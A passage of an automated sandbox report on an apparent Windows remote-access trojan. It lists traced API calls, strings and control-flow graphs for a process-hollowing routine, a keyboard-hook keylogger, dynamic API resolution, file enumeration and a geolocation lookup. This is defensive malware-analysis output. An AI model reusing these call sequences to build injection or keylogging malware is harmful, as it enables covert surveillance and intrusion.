55857->55858 55859 4117db SetLastError 55857->55859 55858->55824 55859->55824 55860->55833 55861->55846 55864 4118c0 55862->55864 55865 411816 ctype ___scrt_fastfail 55862->55865 55863 4117d7 SetLastError 55863->55865 55864->55848 55865->55863 55865->55864 55867 411bbb IsBadReadPtr 55866->55867 55874 411ca5 55866->55874 55868 411bd5 55867->55868 55867->55874 55869 411cbd SetLastError 55868->55869 55872 411ca7 SetLastError 55868->55872 55873 411c8a IsBadReadPtr 55868->55873 55868->55874 55889 440f5d 55868->55889 55869->55874 55872->55874 55873->55868 55873->55874 55874->55843 55876 41198a 55874->55876 55880 4119b0 55876->55880 55877 411a99 55878 4118ed VirtualProtect 55877->55878 55879 411aab 55878->55879 55879->55852 55880->55877 55880->55879 55904 4118ed 55880->55904 55883 10002215 55882->55883 55884 1000221a dllmain_dispatch 55882->55884 55908 100022b1 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___get_entropy 55883->55908 55884->55854 55886->55840 55887->55841 55888->55853 55890 446206 55889->55890 55891 446213 55890->55891 55892 44621e 55890->55892 55893 4461b8 ___crtLCMapStringA 21 API calls 55891->55893 55894 446226 55892->55894 55900 44622f __Getctype 55892->55900 55898 44621b 55893->55898 55895 446802 _free 20 API calls 55894->55895 55895->55898 55896 446234 55902 44062d 20 API calls _free 55896->55902 55897 446259 RtlReAllocateHeap 55897->55898 55897->55900 55898->55868 55900->55896 55900->55897 55903 443001 7 API calls 2 library calls 55900->55903 55902->55898 55903->55900 55905 4118fe 55904->55905 55907 4118f6 55904->55907 55906 411971 VirtualProtect 55905->55906 55905->55907 55906->55907 55907->55880 55908->55884 55909 42f97e 55910 42f989 55909->55910 55911 42f99d 55910->55911 55913 432f7f 55910->55913 55914 432f8a 55913->55914 55915 432f8e 55913->55915 55914->55911 55916 440f5d 22 API calls 55915->55916 55916->55914 55917 40165e 55918 401666 55917->55918 55919 401669 55917->55919 55920 4016a8 55919->55920 55923 401696 55919->55923 55921 43455e new 22 API calls 55920->55921 55922 40169c 55921->55922 55924 43455e new 22 API calls 55923->55924 55924->55922 55925 426cdc 55930 426d59 send 55925->55930 55931 10001f3f 55932 10001f4b ___DestructExceptionObject 55931->55932 55949 1000247c 55932->55949 55934 10001f52 55935 10002041 55934->55935 55936 10001f7c 55934->55936 55943 10001f57 ___scrt_is_nonwritable_in_current_image 55934->55943 55965 10002639 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 55935->55965 55960 100023de IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 55936->55960 55939 10002048 55940 10001f8b __RTC_Initialize 55940->55943 55961 100022fc RtlInitializeSListHead 55940->55961 55942 10001f99 ___scrt_initialize_default_local_stdio_options 55962 100046c5 5 API calls _ValidateLocalCookies 55942->55962 55945 10001fad 55945->55943 55963 100023b3 IsProcessorFeaturePresent ___isa_available_init ___scrt_release_startup_lock 55945->55963 55947 10001fb8 55947->55943 55964 10004669 5 API calls _ValidateLocalCookies 55947->55964 55950 10002485 55949->55950 55966 10002933 IsProcessorFeaturePresent 55950->55966 55952 10002491 55967 100034ea 55952->55967 55954 10002496 55955 1000249a 55954->55955 55976 100053c8 55954->55976 55955->55934 55958 100024b1 55958->55934 55960->55940 55961->55942 55962->55945 55963->55947 55964->55943 55965->55939 55966->55952 55968 100034ef ___vcrt_initialize_winapi_thunks 55967->55968 55980 10003936 6 API calls 2 library calls 55968->55980 55970 100034f9 55971 100034fd 55970->55971 55981 100038e8 55970->55981 55971->55954 55973 10003505 55974 10003510 55973->55974 55989 10003972 RtlDeleteCriticalSection 55973->55989 55974->55954 56008 10007457 55976->56008 55979 10003529 7 API calls 3 library calls 55979->55955 55980->55970 55990 10003af1 55981->55990 55985 1000390b 55986 10003918 55985->55986 55996 1000391b 5 API calls ___vcrt_FlsFree 55985->55996 55986->55973 55988 100038fd 55988->55973 55989->55971 55997 10003a82 55990->55997 55992 10003b0b 55993 10003b24 TlsAlloc 55992->55993 55994 100038f2 55992->55994 55994->55988 55995 10003ba2 5 API calls try_get_function 55994->55995 55995->55985 55996->55988 55998 10003aaa 55997->55998 56000 10003aa6 __crt_fast_encode_pointer 55997->56000 55998->56000 56001 100039be 55998->56001 56000->55992 56003 100039cd try_get_first_available_module 56001->56003 56002 100039ea LoadLibraryExW 56002->56003 56004 10003a05 GetLastError 56002->56004 56003->56002 56005 10003a60 FreeLibrary 56003->56005 56006 10003a77 56003->56006 56007 10003a38 LoadLibraryExW 56003->56007 56004->56003 56005->56003 56006->56000 56007->56003 56011 10007470 56008->56011 56009 10002ada _ValidateLocalCookies 5 API calls 56010 100024a3 56009->56010 56010->55958 56010->55979 56011->56009 56012 10005bff 56020 10005d5c 56012->56020 56014 10005c13 56017 10005c1b 56018 10005c28 56017->56018 56028 10005c2b 10 API calls 56017->56028 56021 10005c45 _abort 4 API calls 56020->56021 56022 10005d83 56021->56022 56023 10005d9b TlsAlloc 56022->56023 56024 10005d8c 56022->56024 56023->56024 56025 10002ada _ValidateLocalCookies 5 API calls 56024->56025 56026 10005c09 56025->56026 56026->56014 56027 10005b7a 19 API calls 2 library calls 56026->56027 56027->56017 56028->56014

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      • LoadLibraryA.KERNEL32(Psapi), ref: 0041CBF6
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CBFF
                                                                                                                                                                      • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CC16
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC19
                                                                                                                                                                      • LoadLibraryA.KERNEL32(shcore), ref: 0041CC2B
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC2E
                                                                                                                                                                      • LoadLibraryA.KERNEL32(user32), ref: 0041CC3F
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC42
                                                                                                                                                                      • LoadLibraryA.KERNEL32(ntdll), ref: 0041CC54
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC57
                                                                                                                                                                      • LoadLibraryA.KERNEL32(kernel32), ref: 0041CC63
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC66
                                                                                                                                                                      • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040EA1C), ref: 0041CC77
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC7A
                                                                                                                                                                      • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040EA1C), ref: 0041CC8B
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC8E
                                                                                                                                                                      • LoadLibraryA.KERNEL32(Shell32), ref: 0041CC9F
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCA2
                                                                                                                                                                      • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040EA1C), ref: 0041CCB3
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCB6
                                                                                                                                                                      • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040EA1C), ref: 0041CCC7
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCCA
                                                                                                                                                                      • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040EA1C), ref: 0041CCDB
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCDE
                                                                                                                                                                      • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040EA1C), ref: 0041CCEF
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCF2
                                                                                                                                                                      • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040EA1C), ref: 0041CD03
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD06
                                                                                                                                                                      • LoadLibraryA.KERNEL32(Shlwapi), ref: 0041CD14
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD17
                                                                                                                                                                      • LoadLibraryA.KERNEL32(kernel32), ref: 0041CD28
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD2B
                                                                                                                                                                      • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040EA1C), ref: 0041CD38
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD3B
                                                                                                                                                                      • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040EA1C), ref: 0041CD48
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD4B
                                                                                                                                                                      • LoadLibraryA.KERNEL32(Iphlpapi), ref: 0041CD5D
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD60
                                                                                                                                                                      • LoadLibraryA.KERNEL32(Iphlpapi), ref: 0041CD6D
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD70
                                                                                                                                                                      • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,0040EA1C), ref: 0041CD81
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD84
                                                                                                                                                                      • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,0040EA1C), ref: 0041CD95
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD98
                                                                                                                                                                      • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CDAA
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CDAD
                                                                                                                                                                      • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CDBA
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CDBD
                                                                                                                                                                      • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CDCA
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CDCD
                                                                                                                                                                      • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CDDA
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CDDD
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AddressProc$LibraryLoad$HandleModule
                                                                                                                                                                      • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                                                                                                                                                      • API String ID: 4236061018-3687161714
                                                                                                                                                                      • Opcode ID: 6b21e851a0d3a51eeec0044f2aae63c374cf6436741b915ef551e22e35f3a136
                                                                                                                                                                      • Instruction ID: 87b5fa294a9840a4da0a94e675c49188b16ea4214af7843bc20054d8537ab592
                                                                                                                                                                      • Opcode Fuzzy Hash: 6b21e851a0d3a51eeec0044f2aae63c374cf6436741b915ef551e22e35f3a136
                                                                                                                                                                      • Instruction Fuzzy Hash: 06419AA0E8035879DA107BB65D8DE3B3E5CD9857953614837B05C93550FBBCDC408EAE

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 448 41812a-418153 449 418157-4181be GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 448->449 450 4181c4-4181cb 449->450 451 4184bb 449->451 450->451 453 4181d1-4181d8 450->453 452 4184bd-4184c7 451->452 453->451 454 4181de-4181e0 453->454 454->451 455 4181e6-418213 call 436f10 * 2 454->455 455->451 460 418219-418224 455->460 460->451 461 41822a-41825a CreateProcessW 460->461 462 418260-418288 VirtualAlloc GetThreadContext 461->462 463 4184b5 GetLastError 461->463 464 41847f-4184b3 VirtualFree GetCurrentProcess NtUnmapViewOfSection NtClose TerminateProcess 462->464 465 41828e-4182ae ReadProcessMemory 462->465 463->451 464->451 465->464 466 4182b4-4182d6 NtCreateSection 465->466 466->464 467 4182dc-4182e9 466->467 468 4182eb-4182f6 NtUnmapViewOfSection 467->468 469 4182fc-41831e NtMapViewOfSection 467->469 468->469 470 418320-41835d VirtualFree NtClose TerminateProcess 469->470 471 418368-41838f GetCurrentProcess NtMapViewOfSection 469->471 470->449 472 418363 470->472 471->464 473 418395-418399 471->473 472->451 474 4183a2-4183c0 call 436990 473->474 475 41839b-41839f 473->475 478 418402-41840b 474->478 479 4183c2-4183d0 474->479 475->474 480 41842b-41842f 478->480 481 41840d-418413 478->481 482 4183d2-4183f5 call 436990 479->482 484 418431-41844e WriteProcessMemory 480->484 485 418454-41846b SetThreadContext 480->485 481->480 483 418415-418428 call 41853e 481->483 491 4183f7-4183fe 482->491 483->480 484->464 489 418450 484->489 485->464 490 41846d-418479 ResumeThread 485->490 489->485 490->464 493 41847b-41847d 490->493 491->478 493->452
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418171
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 00418174
                                                                                                                                                                      • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 00418185
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 00418188
                                                                                                                                                                      • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 00418199
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 0041819C
                                                                                                                                                                      • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004181AD
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 004181B0
                                                                                                                                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418252
                                                                                                                                                                      • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041826A
                                                                                                                                                                      • GetThreadContext.KERNEL32(?,00000000), ref: 00418280
                                                                                                                                                                      • ReadProcessMemory.KERNEL32 ref: 004182A6
                                                                                                                                                                      • NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 004182CE
                                                                                                                                                                      • NtUnmapViewOfSection.NTDLL(?,?), ref: 004182F6
                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 00418316
                                                                                                                                                                      • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00418328
                                                                                                                                                                      • NtClose.NTDLL(?), ref: 00418332
                                                                                                                                                                      • TerminateProcess.KERNEL32(?,00000000), ref: 0041833C
                                                                                                                                                                      • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041837C
                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,00000000), ref: 00418387
                                                                                                                                                                      • WriteProcessMemory.KERNEL32 ref: 00418446
                                                                                                                                                                      • SetThreadContext.KERNEL32(?,00000000), ref: 00418463
                                                                                                                                                                      • ResumeThread.KERNEL32(?), ref: 00418470
                                                                                                                                                                      • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00418487
                                                                                                                                                                      • GetCurrentProcess.KERNEL32(?), ref: 00418492
                                                                                                                                                                      • NtUnmapViewOfSection.NTDLL(00000000), ref: 00418499
                                                                                                                                                                      • NtClose.NTDLL(?), ref: 004184A3
                                                                                                                                                                      • TerminateProcess.KERNEL32(?,00000000), ref: 004184AD
                                                                                                                                                                      • GetLastError.KERNEL32 ref: 004184B5
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Process$Section$AddressHandleModuleProcView$ThreadVirtual$CloseContextCreateCurrentFreeMemoryTerminateUnmap$AllocErrorLastReadResumeWrite
                                                                                                                                                                      • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                                                                                                                                                      • API String ID: 316982871-3035715614
                                                                                                                                                                      • Opcode ID: c823a5a523639eb235f5adfe7c5fce7303d6972b4bd708db87ed0c766a231877
                                                                                                                                                                      • Instruction ID: d7ba82c79e3f17b97bd8f2c1aaed993f07984c16d96ff77cb9dc1491e823fc6f
                                                                                                                                                                      • Opcode Fuzzy Hash: c823a5a523639eb235f5adfe7c5fce7303d6972b4bd708db87ed0c766a231877
                                                                                                                                                                      • Instruction Fuzzy Hash: 69A15FB0604305AFDB209F64DD85B6B7BE8FF48705F00482EF685D6291EB78D844CB59

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 1666 40a2f3-40a30a 1667 40a30c-40a326 GetModuleHandleA SetWindowsHookExA 1666->1667 1668 40a36e-40a37e GetMessageA 1666->1668 1667->1668 1671 40a328-40a36c GetLastError call 41bc1f call 4052fd call 402093 call 41b580 call 401fd8 1667->1671 1669 40a380-40a398 TranslateMessage DispatchMessageA 1668->1669 1670 40a39a 1668->1670 1669->1668 1669->1670 1672 40a39c-40a3a1 1670->1672 1671->1672
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040A30E
                                                                                                                                                                      • SetWindowsHookExA.USER32(0000000D,0040A2DF,00000000), ref: 0040A31C
                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0040A328
                                                                                                                                                                        • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                                                                                      • GetMessageA.USER32 ref: 0040A376
                                                                                                                                                                      • TranslateMessage.USER32(?), ref: 0040A385
                                                                                                                                                                      • DispatchMessageA.USER32(?), ref: 0040A390
                                                                                                                                                                      Strings
                                                                                                                                                                      • Keylogger initialization failure: error , xrefs: 0040A33C
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                                                                                                                                      • String ID: Keylogger initialization failure: error
                                                                                                                                                                      • API String ID: 3219506041-952744263
                                                                                                                                                                      • Opcode ID: 0dc1c2640651d2c5fe804fd6a671654dad06f326112922524979b06ffad0e6ec
                                                                                                                                                                      • Instruction ID: 8743f2250fb8cae6a99ae5fb3d4b34fe2baf279f6720e4878f05ffc9670b3ffc
                                                                                                                                                                      • Opcode Fuzzy Hash: 0dc1c2640651d2c5fe804fd6a671654dad06f326112922524979b06ffad0e6ec
                                                                                                                                                                      • Instruction Fuzzy Hash: 6011BF31510301EBC710BB769D0986B77ACEA95715B20097EFC82E22D1EB34C910CBAA

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 1748 100010f1-10001166 call 10002c40 * 2 lstrlenW call 10002c40 lstrcatW lstrlenW 1755 10001177-1000119e lstrlenW FindFirstFileW 1748->1755 1756 10001168-10001172 lstrlenW 1748->1756 1757 100011a0-100011a8 1755->1757 1758 100011e1-100011e9 1755->1758 1756->1755 1759 100011c7-100011d8 FindNextFileW 1757->1759 1760 100011aa-100011c4 call 10001000 1757->1760 1759->1757 1762 100011da-100011db FindClose 1759->1762 1760->1759 1762->1758
                                                                                                                                                                      APIs
                                                                                                                                                                      • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                                                                                                                                                                      • lstrcatW.KERNEL32(?,?), ref: 10001151
                                                                                                                                                                      • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                                                                                                                                                                      • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                                                                                                                                                                      • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                                                                                                                                                                      • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                                                                                                                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 100011D0
                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 100011DB
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.643127619.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.643112844.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.643127619.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_10000000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1083526818-0
                                                                                                                                                                      • Opcode ID: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
                                                                                                                                                                      • Instruction ID: 89aa6ca17049c9a574106098fd68ded4b08ae6dd255c3979a52dcbc6bb9ed716
                                                                                                                                                                      • Opcode Fuzzy Hash: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
                                                                                                                                                                      • Instruction Fuzzy Hash: D22193715043586BE714EB649C49FDF7BDCEF84394F00092AFA58D3190E770D64487A6
                                                                                                                                                                      APIs
                                                                                                                                                                      • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041B438
                                                                                                                                                                      • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041B44E
                                                                                                                                                                      • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041B467
                                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 0041B4AD
                                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 0041B4B0
                                                                                                                                                                      Strings
                                                                                                                                                                      • http://geoplugin.net/json.gp, xrefs: 0041B448
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Internet$CloseHandleOpen$FileRead
                                                                                                                                                                      • String ID: http://geoplugin.net/json.gp
                                                                                                                                                                      • API String ID: 3121278467-91888290
                                                                                                                                                                      • Opcode ID: 70a4068dcfb2335a76a71926155551062e92c520b8980e27f9727ee13041a59e
                                                                                                                                                                      • Instruction ID: e320c318363c88f1c040182635621d8729538b68a2f0080144892bf513bd3cc2
                                                                                                                                                                      • Opcode Fuzzy Hash: 70a4068dcfb2335a76a71926155551062e92c520b8980e27f9727ee13041a59e
                                                                                                                                                                      • Instruction Fuzzy Hash: 011198311053126BD224AB269C49EBF7F9CEF86765F10043EF945A2282DB689C44C6FA
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 004117D7: SetLastError.KERNEL32(0000000D,00411D57,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 004117DD
                                                                                                                                                                      • SetLastError.KERNEL32(000000C1,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 00411D72
                                                                                                                                                                      • GetNativeSystemInfo.KERNEL32(?), ref: 00411DE0
                                                                                                                                                                      • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?), ref: 00411E04
                                                                                                                                                                        • Part of subcall function 00411CDE: VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411E22,?,00000000,00003000,00000040,00000000,?,?), ref: 00411CEE
                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,?), ref: 00411E4B
                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 00411E52
                                                                                                                                                                      • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411F65
                                                                                                                                                                        • Part of subcall function 004120B2: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F72,?,?,?,?,?), ref: 00412122
                                                                                                                                                                        • Part of subcall function 004120B2: HeapFree.KERNEL32(00000000), ref: 00412129
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3950776272-0
                                                                                                                                                                      • Opcode ID: 718d42136e622159178195cb0efe2cc12f9c08079781f225a480952b3bcd75f7
                                                                                                                                                                      • Instruction ID: da58ab861bd0a84ec3871346ef31e8b8814b9d9500880b3a3e1890ad13292c25
                                                                                                                                                                      • Opcode Fuzzy Hash: 718d42136e622159178195cb0efe2cc12f9c08079781f225a480952b3bcd75f7
                                                                                                                                                                      • Instruction Fuzzy Hash: F761A270700611ABCB209F66C981BAA7BA5AF44704F14411AFF05877A2D77CE8C2CBD9
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00413584: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004135A4
                                                                                                                                                                        • Part of subcall function 00413584: RegQueryValueExA.KERNEL32 ref: 004135C2
                                                                                                                                                                        • Part of subcall function 00413584: RegCloseKey.KERNEL32(?), ref: 004135CD
                                                                                                                                                                      • Sleep.KERNEL32(00000BB8), ref: 0040F896
                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 0040F905
                                                                                                                                                                      Strings
